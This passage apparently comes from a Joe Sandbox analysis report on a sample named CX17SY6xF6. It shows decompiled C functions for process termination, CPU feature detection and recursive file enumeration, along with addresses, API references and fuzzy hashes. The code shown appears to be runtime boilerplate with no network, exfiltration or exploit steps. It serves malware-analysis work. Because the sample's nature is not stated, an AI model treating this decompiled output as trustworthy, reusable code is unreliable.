                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,010DC19F,010DA67C,0112A700,0000000C,010DC2F6,010DA67C,00000002,00000000,?,010DA67C), ref: 010DC1F1
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 010DC203
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: e4c149033aacce24115d977b053a586da7a1134b983b892df4f02082ff9d2ce1
                                                                                                                                                                                                                                                    • Instruction ID: 0fc80b6eedfd487a6f74394644bad558e84c56c3902e0f3d22356b3414b51480
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4c149033aacce24115d977b053a586da7a1134b983b892df4f02082ff9d2ce1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59E04636000258AFDF216FA9DA08AD83FA9EF44655F410058FD899B121CB3AEC82CF80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                    			E010DE0BE(intOrPtr __edx) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed char _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                                    				intOrPtr* _t75;
                                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t84 = __edx;
                                                                                                                                                                                                                                                    				 *0x116e4ec =  *0x116e4ec & 0x00000000;
                                                                                                                                                                                                                                                    				 *0x116dd80 =  *0x116dd80 | 1;
                                                                                                                                                                                                                                                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                    				 *0x116dd80 =  *0x116dd80 | 0x00000002;
                                                                                                                                                                                                                                                    				 *0x116e4ec = 1;
                                                                                                                                                                                                                                                    				_t86 =  &_v48;
                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                                    				_pop(_t73);
                                                                                                                                                                                                                                                    				 *_t86 = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t86 + 4)) = 1;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t86 + 8)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                                                                                                                                                                                                                                                    				_v16 = _v48;
                                                                                                                                                                                                                                                    				_v8 = _v36 ^ 0x49656e69;
                                                                                                                                                                                                                                                    				_v12 = _v40 ^ 0x6c65746e;
                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                                    				_t75 =  &_v48;
                                                                                                                                                                                                                                                    				 *_t75 = 1;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t75 + 4)) = _t73;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t75 + 8)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                                                                                                                                                                                                                                                    				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                    					_t91 =  *0x116e4f0; // 0x2
                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                    					_v32 = _v36;
                                                                                                                                                                                                                                                    					_t59 = _v40;
                                                                                                                                                                                                                                                    					_v8 = _t59;
                                                                                                                                                                                                                                                    					_v28 = _t59;
                                                                                                                                                                                                                                                    					if(_v16 >= 7) {
                                                                                                                                                                                                                                                    						_t65 = 7;
                                                                                                                                                                                                                                                    						_push(_t75);
                                                                                                                                                                                                                                                    						asm("cpuid");
                                                                                                                                                                                                                                                    						_t77 =  &_v48;
                                                                                                                                                                                                                                                    						 *_t77 = _t65;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t77 + 8)) = 0;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                                                                                                                                                                                                                                                    						_t66 = _v44;
                                                                                                                                                                                                                                                    						_v24 = _t66;
                                                                                                                                                                                                                                                    						_t59 = _v8;
                                                                                                                                                                                                                                                    						if((_t66 & 0x00000200) != 0) {
                                                                                                                                                                                                                                                    							 *0x116e4f0 = _t91 | 0x00000002;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if((_t59 & 0x00100000) != 0) {
                                                                                                                                                                                                                                                    						 *0x116dd80 =  *0x116dd80 | 0x00000004;
                                                                                                                                                                                                                                                    						 *0x116e4ec = 2;
                                                                                                                                                                                                                                                    						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                                                                                                                                                                                                                                                    							asm("xgetbv");
                                                                                                                                                                                                                                                    							_v20 = _t59;
                                                                                                                                                                                                                                                    							_v16 = _t84;
                                                                                                                                                                                                                                                    							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                                                                                                                                                                                                                                                    								_t62 =  *0x116dd80; // 0x2f
                                                                                                                                                                                                                                                    								_t63 = _t62 | 0x00000008;
                                                                                                                                                                                                                                                    								 *0x116e4ec = 3;
                                                                                                                                                                                                                                                    								 *0x116dd80 = _t63;
                                                                                                                                                                                                                                                    								if((_v24 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                    									 *0x116e4ec = 5;
                                                                                                                                                                                                                                                    									 *0x116dd80 = _t63 | 0x00000020;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t68 = _v48 & 0x0fff3ff0;
                                                                                                                                                                                                                                                    				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                                                                                                                                                                                                                                                    					_t94 =  *0x116e4f0; // 0x2
                                                                                                                                                                                                                                                    					_t91 = _t94 | 0x00000001;
                                                                                                                                                                                                                                                    					 *0x116e4f0 = _t91;
                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                                                    0x010de0be
                                                                                                                                                                                                                                                    0x010de0c1
                                                                                                                                                                                                                                                    0x010de0cf
                                                                                                                                                                                                                                                    0x010de0de
                                                                                                                                                                                                                                                    0x010de25b
                                                                                                                                                                                                                                                    0x010de261
                                                                                                                                                                                                                                                    0x010de261
                                                                                                                                                                                                                                                    0x010de0e4
                                                                                                                                                                                                                                                    0x010de0ea
                                                                                                                                                                                                                                                    0x010de0f5
                                                                                                                                                                                                                                                    0x010de0fb
                                                                                                                                                                                                                                                    0x010de0fe
                                                                                                                                                                                                                                                    0x010de0ff
                                                                                                                                                                                                                                                    0x010de103
                                                                                                                                                                                                                                                    0x010de104
                                                                                                                                                                                                                                                    0x010de106
                                                                                                                                                                                                                                                    0x010de109
                                                                                                                                                                                                                                                    0x010de10e
                                                                                                                                                                                                                                                    0x010de117
                                                                                                                                                                                                                                                    0x010de128
                                                                                                                                                                                                                                                    0x010de133
                                                                                                                                                                                                                                                    0x010de139
                                                                                                                                                                                                                                                    0x010de13a
                                                                                                                                                                                                                                                    0x010de142
                                                                                                                                                                                                                                                    0x010de148
                                                                                                                                                                                                                                                    0x010de14a
                                                                                                                                                                                                                                                    0x010de14d
                                                                                                                                                                                                                                                    0x010de150
                                                                                                                                                                                                                                                    0x010de153
                                                                                                                                                                                                                                                    0x010de198
                                                                                                                                                                                                                                                    0x010de198
                                                                                                                                                                                                                                                    0x010de19e
                                                                                                                                                                                                                                                    0x010de1a5
                                                                                                                                                                                                                                                    0x010de1a8
                                                                                                                                                                                                                                                    0x010de1ab
                                                                                                                                                                                                                                                    0x010de1ae
                                                                                                                                                                                                                                                    0x010de1b1
                                                                                                                                                                                                                                                    0x010de1b5
                                                                                                                                                                                                                                                    0x010de1b8
                                                                                                                                                                                                                                                    0x010de1b9
                                                                                                                                                                                                                                                    0x010de1be
                                                                                                                                                                                                                                                    0x010de1c1
                                                                                                                                                                                                                                                    0x010de1c3
                                                                                                                                                                                                                                                    0x010de1c6
                                                                                                                                                                                                                                                    0x010de1c9
                                                                                                                                                                                                                                                    0x010de1cc
                                                                                                                                                                                                                                                    0x010de1d4
                                                                                                                                                                                                                                                    0x010de1d7
                                                                                                                                                                                                                                                    0x010de1da
                                                                                                                                                                                                                                                    0x010de1df
                                                                                                                                                                                                                                                    0x010de1df
                                                                                                                                                                                                                                                    0x010de1da
                                                                                                                                                                                                                                                    0x010de1ec
                                                                                                                                                                                                                                                    0x010de1ee
                                                                                                                                                                                                                                                    0x010de1f5
                                                                                                                                                                                                                                                    0x010de204
                                                                                                                                                                                                                                                    0x010de20f
                                                                                                                                                                                                                                                    0x010de212
                                                                                                                                                                                                                                                    0x010de215
                                                                                                                                                                                                                                                    0x010de226
                                                                                                                                                                                                                                                    0x010de22c
                                                                                                                                                                                                                                                    0x010de231
                                                                                                                                                                                                                                                    0x010de234
                                                                                                                                                                                                                                                    0x010de242
                                                                                                                                                                                                                                                    0x010de247
                                                                                                                                                                                                                                                    0x010de24c
                                                                                                                                                                                                                                                    0x010de256
                                                                                                                                                                                                                                                    0x010de256
                                                                                                                                                                                                                                                    0x010de247
                                                                                                                                                                                                                                                    0x010de226
                                                                                                                                                                                                                                                    0x010de204
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010de1ec
                                                                                                                                                                                                                                                    0x010de158
                                                                                                                                                                                                                                                    0x010de162
                                                                                                                                                                                                                                                    0x010de187
                                                                                                                                                                                                                                                    0x010de18d
                                                                                                                                                                                                                                                    0x010de190
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 010DE0D7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 501f676ec1f956fdc5a7862620f1295412ddcf7fd95204714b13733c28ea1f14
                                                                                                                                                                                                                                                    • Instruction ID: 81e42abf9fe6051686e6461d190efb65c36b910facdbb2962555bffa882c0d10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 501f676ec1f956fdc5a7862620f1295412ddcf7fd95204714b13733c28ea1f14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50519A75E01309DFEB68CFAAD9856AEBBF4FB88314F1481AAD454EB254D331A540CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                                                                                                    			E010E1989(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				WCHAR* _v36;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v556;
                                                                                                                                                                                                                                                    				intOrPtr _v558;
                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                                                                                    				intOrPtr* _v608;
                                                                                                                                                                                                                                                    				signed int _v612;
                                                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                                                    				intOrPtr _v644;
                                                                                                                                                                                                                                                    				intOrPtr _v648;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                    				union _FINDEX_INFO_LEVELS _t66;
                                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                    				WCHAR* _t90;
                                                                                                                                                                                                                                                    				intOrPtr* _t94;
                                                                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                                                    				intOrPtr _t111;
                                                                                                                                                                                                                                                    				void* _t112;
                                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                                    				signed int _t117;
                                                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                                                    				union _FINDEX_INFO_LEVELS _t119;
                                                                                                                                                                                                                                                    				void* _t124;
                                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                                    				signed int _t126;
                                                                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                                                                    				void* _t133;
                                                                                                                                                                                                                                                    				signed int _t134;
                                                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                                                    				void* _t136;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                    				_t94 = _a4;
                                                                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                                    				_t2 = _t94 + 2; // 0x2
                                                                                                                                                                                                                                                    				_t110 = _t2;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					_t40 =  *_t94;
                                                                                                                                                                                                                                                    					_t94 = _t94 + 2;
                                                                                                                                                                                                                                                    				} while (_t40 != 0);
                                                                                                                                                                                                                                                    				_t117 = _a12;
                                                                                                                                                                                                                                                    				_t97 = (_t94 - _t110 >> 1) + 1;
                                                                                                                                                                                                                                                    				_v8 = _t97;
                                                                                                                                                                                                                                                    				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
                                                                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                                                                    					_t5 = _t117 + 1; // 0x1
                                                                                                                                                                                                                                                    					_t89 = _t5 + _t97;
                                                                                                                                                                                                                                                    					_t124 = E010DA67D(_t97, _t89, 2);
                                                                                                                                                                                                                                                    					_pop(_t99);
                                                                                                                                                                                                                                                    					__eflags = _t117;
                                                                                                                                                                                                                                                    					if(_t117 == 0) {
                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                    						_push(_v8);
                                                                                                                                                                                                                                                    						_t89 = _t89 - _t117;
                                                                                                                                                                                                                                                    						_t45 = E010DBE98(_t99, _t124 + _t117 * 2, _t89, _a4);
                                                                                                                                                                                                                                                    						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                    						__eflags = _t45;
                                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_t82 = E010E1C02(_a16, __eflags, _t124);
                                                                                                                                                                                                                                                    							E010DA6DA(0);
                                                                                                                                                                                                                                                    							_t84 = _t82;
                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_push(_t117);
                                                                                                                                                                                                                                                    						_t85 = E010DBE98(_t99, _t124, _t89, _a8);
                                                                                                                                                                                                                                                    						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                    						__eflags = _t85;
                                                                                                                                                                                                                                                    						if(_t85 != 0) {
                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                    							E010D977A();
                                                                                                                                                                                                                                                    							asm("int3");
                                                                                                                                                                                                                                                    							_t132 = _t134;
                                                                                                                                                                                                                                                    							_t135 = _t134 - 0x260;
                                                                                                                                                                                                                                                    							_t48 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    							_v48 = _t48 ^ _t132;
                                                                                                                                                                                                                                                    							_t111 = _v28;
                                                                                                                                                                                                                                                    							_t100 = _v32;
                                                                                                                                                                                                                                                    							_push(_t89);
                                                                                                                                                                                                                                                    							_t90 = _v36;
                                                                                                                                                                                                                                                    							_push(_t124);
                                                                                                                                                                                                                                                    							_push(_t117);
                                                                                                                                                                                                                                                    							_t125 = 0x5c;
                                                                                                                                                                                                                                                    							_v644 = _t111;
                                                                                                                                                                                                                                                    							_v648 = 0x2f;
                                                                                                                                                                                                                                                    							_t118 = 0x3a;
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								__eflags = _t100 - _t90;
                                                                                                                                                                                                                                                    								if(_t100 == _t90) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t50 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                    								__eflags = _t50 - _v612;
                                                                                                                                                                                                                                                    								if(_t50 != _v612) {
                                                                                                                                                                                                                                                    									__eflags = _t50 - _t125;
                                                                                                                                                                                                                                                    									if(_t50 != _t125) {
                                                                                                                                                                                                                                                    										__eflags = _t50 - _t118;
                                                                                                                                                                                                                                                    										if(_t50 != _t118) {
                                                                                                                                                                                                                                                    											_t100 = _t100 - 2;
                                                                                                                                                                                                                                                    											__eflags = _t100;
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t126 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                    							__eflags = _t126 - _t118;
                                                                                                                                                                                                                                                    							if(_t126 != _t118) {
                                                                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                                                                    								_t51 = _t126;
                                                                                                                                                                                                                                                    								_t119 = 0;
                                                                                                                                                                                                                                                    								_t112 = 0x2f;
                                                                                                                                                                                                                                                    								__eflags = _t51 - _t112;
                                                                                                                                                                                                                                                    								if(_t51 == _t112) {
                                                                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                                                                    									_t53 = 1;
                                                                                                                                                                                                                                                    									__eflags = 1;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t114 = 0x5c;
                                                                                                                                                                                                                                                    									__eflags = _t51 - _t114;
                                                                                                                                                                                                                                                    									if(_t51 == _t114) {
                                                                                                                                                                                                                                                    										goto L23;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_t115 = 0x3a;
                                                                                                                                                                                                                                                    										__eflags = _t51 - _t115;
                                                                                                                                                                                                                                                    										if(_t51 == _t115) {
                                                                                                                                                                                                                                                    											goto L23;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_t53 = 0;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t103 = (_t100 - _t90 >> 1) + 1;
                                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                                    								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                                                                                                                                                                                                                                    								E010DF070(_t119,  &_v604, _t119, 0x250);
                                                                                                                                                                                                                                                    								_t136 = _t135 + 0xc;
                                                                                                                                                                                                                                                    								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
                                                                                                                                                                                                                                                    								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                    								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                    									_t104 = _v608;
                                                                                                                                                                                                                                                    									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                                                                                                                                                                                                                                    									__eflags = _t62;
                                                                                                                                                                                                                                                    									_v616 = _t62 >> 2;
                                                                                                                                                                                                                                                    									_t64 = 0x2e;
                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                    										__eflags = _v604.cFileName - _t64;
                                                                                                                                                                                                                                                    										if(_v604.cFileName != _t64) {
                                                                                                                                                                                                                                                    											L36:
                                                                                                                                                                                                                                                    											_push(_t104);
                                                                                                                                                                                                                                                    											_t66 = E010E1989(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
                                                                                                                                                                                                                                                    											_t136 = _t136 + 0x10;
                                                                                                                                                                                                                                                    											__eflags = _t66;
                                                                                                                                                                                                                                                    											if(_t66 != 0) {
                                                                                                                                                                                                                                                    												goto L26;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												goto L37;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											__eflags = _v558 - _t119;
                                                                                                                                                                                                                                                    											if(_v558 == _t119) {
                                                                                                                                                                                                                                                    												goto L37;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												__eflags = _v558 - _t64;
                                                                                                                                                                                                                                                    												if(_v558 != _t64) {
                                                                                                                                                                                                                                                    													goto L36;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													__eflags = _v556 - _t119;
                                                                                                                                                                                                                                                    													if(_v556 == _t119) {
                                                                                                                                                                                                                                                    														goto L37;
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    														goto L36;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                                                                    										L37:
                                                                                                                                                                                                                                                    										_t71 = FindNextFileW(_t127,  &_v604);
                                                                                                                                                                                                                                                    										_t104 = _v608;
                                                                                                                                                                                                                                                    										__eflags = _t71;
                                                                                                                                                                                                                                                    										_t64 = 0x2e;
                                                                                                                                                                                                                                                    									} while (_t71 != 0);
                                                                                                                                                                                                                                                    									_t72 = _t104;
                                                                                                                                                                                                                                                    									_t107 = _v616;
                                                                                                                                                                                                                                                    									_t113 =  *_t72;
                                                                                                                                                                                                                                                    									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                                                                                                                                                                                                                                    									__eflags = _t107 - _t75;
                                                                                                                                                                                                                                                    									if(_t107 != _t75) {
                                                                                                                                                                                                                                                    										E010E2A50(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E010E17A4);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(_v608);
                                                                                                                                                                                                                                                    									_t66 = E010E1989(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
                                                                                                                                                                                                                                                    									L26:
                                                                                                                                                                                                                                                    									_t119 = _t66;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                    								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                    									FindClose(_t127);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								__eflags = _t100 -  &(_t90[1]);
                                                                                                                                                                                                                                                    								if(_t100 ==  &(_t90[1])) {
                                                                                                                                                                                                                                                    									goto L19;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(_t111);
                                                                                                                                                                                                                                                    									E010E1989(_t90, _t100, 0, _t126, _t90, 0, 0);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _v12 ^ _t132;
                                                                                                                                                                                                                                                    							return E010DDC5F(_v12 ^ _t132);
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t84 = 0xc;
                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                    					return _t84;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L40:
                                                                                                                                                                                                                                                    			}

























































                                                                                                                                                                                                                                                    0x010e198e
                                                                                                                                                                                                                                                    0x010e198f
                                                                                                                                                                                                                                                    0x010e1992
                                                                                                                                                                                                                                                    0x010e1993
                                                                                                                                                                                                                                                    0x010e1996
                                                                                                                                                                                                                                                    0x010e1996
                                                                                                                                                                                                                                                    0x010e1999
                                                                                                                                                                                                                                                    0x010e1999
                                                                                                                                                                                                                                                    0x010e199c
                                                                                                                                                                                                                                                    0x010e199f
                                                                                                                                                                                                                                                    0x010e19a4
                                                                                                                                                                                                                                                    0x010e19ae
                                                                                                                                                                                                                                                    0x010e19b1
                                                                                                                                                                                                                                                    0x010e19b6
